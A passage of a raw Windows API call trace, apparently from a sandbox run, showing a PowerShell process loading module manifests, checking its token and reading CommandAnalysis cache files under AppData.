(in: hFile=0x968, lpBuffer=0x25b5c73afb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8cf48, lpOverlapped=0x0 | out: lpBuffer=0x25b5c73afb8*, lpNumberOfBytesRead=0x653ef8cf48*=0x2ec, lpOverlapped=0x0) returned 1 [0282.245] ReadFile (in: hFile=0x968, lpBuffer=0x25b5c73afb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d308, lpOverlapped=0x0 | out: lpBuffer=0x25b5c73afb8*, lpNumberOfBytesRead=0x653ef8d308*=0x0, lpOverlapped=0x0) returned 1 [0282.246] CloseHandle (hObject=0x968) returned 1 [0282.246] ReleaseMutex (hMutex=0x964) returned 1 [0282.246] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\Microsoft.PowerShell.Host.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d380, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\Microsoft.PowerShell.Host.psd1", lpFilePart=0x0) returned 0x6b [0282.246] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d01ce0 [0282.246] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73d01ce0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.246] CoTaskMemFree (pv=0x25b73d01ce0) [0282.246] CoTaskMemAlloc (cb=0x20c) returned 0x25b73d01020 [0282.246] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73d01020 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.246] CoTaskMemFree (pv=0x25b73d01020) [0282.246] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0282.247] GetCurrentProcess () returned 0xffffffffffffffff [0282.247] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0x968) returned 1 [0282.247] GetTokenInformation (in: TokenHandle=0x968, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.247] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b739849f0 [0282.247] GetTokenInformation (in: TokenHandle=0x968, TokenInformationClass=0x1, TokenInformation=0x25b739849f0, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b739849f0, ReturnLength=0x653ef8d6b8) returned 1 [0282.248] LocalFree (hMem=0x25b739849f0) returned 0x0 [0282.248] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c745910, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c745910*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.248] CreateMutexW (lpMutexAttributes=0x25b5c745a60, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0x96c [0282.249] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0x96c, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.249] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cffae0 [0282.249] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cffae0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.249] CoTaskMemFree (pv=0x25b73cffae0) [0282.249] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\Microsoft.PowerShell.Host.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\Microsoft.PowerShell.Host.psd1", lpFilePart=0x0) returned 0x6b [0282.249] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d6a0) returned 1 [0282.249] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\Microsoft.PowerShell.Host.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.host\\microsoft.powershell.host.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c7460f0 | out: lpFileInformation=0x25b5c7460f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a4)) returned 1 [0282.249] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d660) returned 1 [0282.249] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8d140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0282.249] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0282.249] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d670 | out: lpFileInformation=0x653ef8d670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0282.250] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d550) returned 1 [0282.250] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_9fd22d45-e580-4e7f-ba2a-734dfe2d9a2c", nBufferLength=0x105, lpBuffer=0x653ef8cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_9fd22d45-e580-4e7f-ba2a-734dfe2d9a2c", lpFilePart=0x0) returned 0x93 [0282.250] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d4d0) returned 1 [0282.259] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_9fd22d45-e580-4e7f-ba2a-734dfe2d9a2c" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_9fd22d45-e580-4e7f-ba2a-734dfe2d9a2c"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x970 [0282.262] GetFileType (hFile=0x970) returned 0x1 [0282.262] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d440) returned 1 [0282.262] GetFileType (hFile=0x970) returned 0x1 [0282.262] ReadFile (in: hFile=0x970, lpBuffer=0x25b5c7473d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d338, lpOverlapped=0x0 | out: lpBuffer=0x25b5c7473d8*, lpNumberOfBytesRead=0x653ef8d338*=0x2b2, lpOverlapped=0x0) returned 1 [0282.264] ReadFile (in: hFile=0x970, lpBuffer=0x25b5c7473d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d308, lpOverlapped=0x0 | out: lpBuffer=0x25b5c7473d8*, lpNumberOfBytesRead=0x653ef8d308*=0x0, lpOverlapped=0x0) returned 1 [0282.264] CloseHandle (hObject=0x970) returned 1 [0282.265] ReleaseMutex (hMutex=0x96c) returned 1 [0282.265] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\Microsoft.PowerShell.Diagnostics.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d380, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\Microsoft.PowerShell.Diagnostics.psd1", lpFilePart=0x0) returned 0x79 [0282.265] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfd8e0 [0282.265] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfd8e0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.265] CoTaskMemFree (pv=0x25b73cfd8e0) [0282.265] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cfd8e0 [0282.265] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cfd8e0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.265] CoTaskMemFree (pv=0x25b73cfd8e0) [0282.265] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0282.265] GetCurrentProcess () returned 0xffffffffffffffff [0282.266] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0x970) returned 1 [0282.266] GetTokenInformation (in: TokenHandle=0x970, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.266] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b73984af0 [0282.266] GetTokenInformation (in: TokenHandle=0x970, TokenInformationClass=0x1, TokenInformation=0x25b73984af0, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b73984af0, ReturnLength=0x653ef8d6b8) returned 1 [0282.267] LocalFree (hMem=0x25b73984af0) returned 0x0 [0282.267] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c74b628, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c74b628*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.268] CreateMutexW (lpMutexAttributes=0x25b5c74b778, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0x974 [0282.268] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0x974, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.268] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d007a0 [0282.268] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73d007a0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.268] CoTaskMemFree (pv=0x25b73d007a0) [0282.268] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\Microsoft.PowerShell.Diagnostics.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\Microsoft.PowerShell.Diagnostics.psd1", lpFilePart=0x0) returned 0x79 [0282.268] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d6a0) returned 1 [0282.268] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\Microsoft.PowerShell.Diagnostics.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.diagnostics\\microsoft.powershell.diagnostics.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c74be20 | out: lpFileInformation=0x25b5c74be20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3880a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3880a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3880a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x256)) returned 1 [0282.268] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d660) returned 1 [0282.268] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8d140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0282.269] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0282.269] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d670 | out: lpFileInformation=0x653ef8d670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0282.269] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d550) returned 1 [0282.269] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_8bdd4f74-735f-4cbb-b944-fa23a05b2f05", nBufferLength=0x105, lpBuffer=0x653ef8cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_8bdd4f74-735f-4cbb-b944-fa23a05b2f05", lpFilePart=0x0) returned 0x93 [0282.269] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d4d0) returned 1 [0282.269] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_8bdd4f74-735f-4cbb-b944-fa23a05b2f05" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_8bdd4f74-735f-4cbb-b944-fa23a05b2f05"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x978 [0282.269] GetFileType (hFile=0x978) returned 0x1 [0282.269] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d440) returned 1 [0282.269] GetFileType (hFile=0x978) returned 0x1 [0282.270] ReadFile (in: hFile=0x978, lpBuffer=0x25b5c74d138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d338, lpOverlapped=0x0 | out: lpBuffer=0x25b5c74d138*, lpNumberOfBytesRead=0x653ef8d338*=0x3ce, lpOverlapped=0x0) returned 1 [0282.272] ReadFile (in: hFile=0x978, lpBuffer=0x25b5c74d138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d308, lpOverlapped=0x0 | out: lpBuffer=0x25b5c74d138*, lpNumberOfBytesRead=0x653ef8d308*=0x0, lpOverlapped=0x0) returned 1 [0282.272] CloseHandle (hObject=0x978) returned 1 [0282.272] ReleaseMutex (hMutex=0x974) returned 1 [0282.272] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\Microsoft.PowerShell.Archive.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d380, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\Microsoft.PowerShell.Archive.psd1", lpFilePart=0x0) returned 0x71 [0282.272] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfd8e0 [0282.272] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfd8e0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.273] CoTaskMemFree (pv=0x25b73cfd8e0) [0282.273] CoTaskMemAlloc (cb=0x20c) returned 0x25b73d007a0 [0282.273] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73d007a0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.273] CoTaskMemFree (pv=0x25b73d007a0) [0282.273] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0282.273] GetCurrentProcess () returned 0xffffffffffffffff [0282.273] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0x978) returned 1 [0282.273] GetTokenInformation (in: TokenHandle=0x978, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.273] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b739844f0 [0282.273] GetTokenInformation (in: TokenHandle=0x978, TokenInformationClass=0x1, TokenInformation=0x25b739844f0, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b739844f0, ReturnLength=0x653ef8d6b8) returned 1 [0282.274] LocalFree (hMem=0x25b739844f0) returned 0x0 [0282.274] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c751588, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c751588*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.275] CreateMutexW (lpMutexAttributes=0x25b5c7516d8, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0x97c [0282.275] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0x97c, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.275] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfa800 [0282.275] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfa800, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.275] CoTaskMemFree (pv=0x25b73cfa800) [0282.275] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\Microsoft.PowerShell.Archive.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\Microsoft.PowerShell.Archive.psd1", lpFilePart=0x0) returned 0x71 [0282.275] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d6a0) returned 1 [0282.275] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\Microsoft.PowerShell.Archive.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive\\microsoft.powershell.archive.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c751d70 | out: lpFileInformation=0x25b5c751d70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x17c)) returned 1 [0282.275] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d660) returned 1 [0282.276] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8d140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0282.276] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0282.277] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d670 | out: lpFileInformation=0x653ef8d670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0282.277] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d550) returned 1 [0282.277] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_2fb762b4-d05f-41c9-800e-eb1b344a91c2", nBufferLength=0x105, lpBuffer=0x653ef8cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_2fb762b4-d05f-41c9-800e-eb1b344a91c2", lpFilePart=0x0) returned 0x93 [0282.277] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d4d0) returned 1 [0282.277] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_2fb762b4-d05f-41c9-800e-eb1b344a91c2" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_2fb762b4-d05f-41c9-800e-eb1b344a91c2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x980 [0282.278] GetFileType (hFile=0x980) returned 0x1 [0282.278] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d440) returned 1 [0282.278] GetFileType (hFile=0x980) returned 0x1 [0282.278] ReadFile (in: hFile=0x980, lpBuffer=0x25b5c753070, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d338, lpOverlapped=0x0 | out: lpBuffer=0x25b5c753070*, lpNumberOfBytesRead=0x653ef8d338*=0x2b5, lpOverlapped=0x0) returned 1 [0282.280] ReadFile (in: hFile=0x980, lpBuffer=0x25b5c753070, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d308, lpOverlapped=0x0 | out: lpBuffer=0x25b5c753070*, lpNumberOfBytesRead=0x653ef8d308*=0x0, lpOverlapped=0x0) returned 1 [0282.280] CloseHandle (hObject=0x980) returned 1 [0282.280] ReleaseMutex (hMutex=0x97c) returned 1 [0282.281] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\AppBackgroundTask.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d380, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\AppBackgroundTask.psd1", lpFilePart=0x0) returned 0x5b [0282.281] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfce40 [0282.281] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfce40, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.281] CoTaskMemFree (pv=0x25b73cfce40) [0282.281] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cff260 [0282.281] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cff260 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.281] CoTaskMemFree (pv=0x25b73cff260) [0282.281] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0282.281] GetCurrentProcess () returned 0xffffffffffffffff [0282.281] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0x980) returned 1 [0282.282] GetTokenInformation (in: TokenHandle=0x980, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.282] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b73984b70 [0282.282] GetTokenInformation (in: TokenHandle=0x980, TokenInformationClass=0x1, TokenInformation=0x25b73984b70, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b73984b70, ReturnLength=0x653ef8d6b8) returned 1 [0282.282] LocalFree (hMem=0x25b73984b70) returned 0x0 [0282.282] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c756fd0, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c756fd0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.283] CreateMutexW (lpMutexAttributes=0x25b5c757120, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0x984 [0282.283] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, 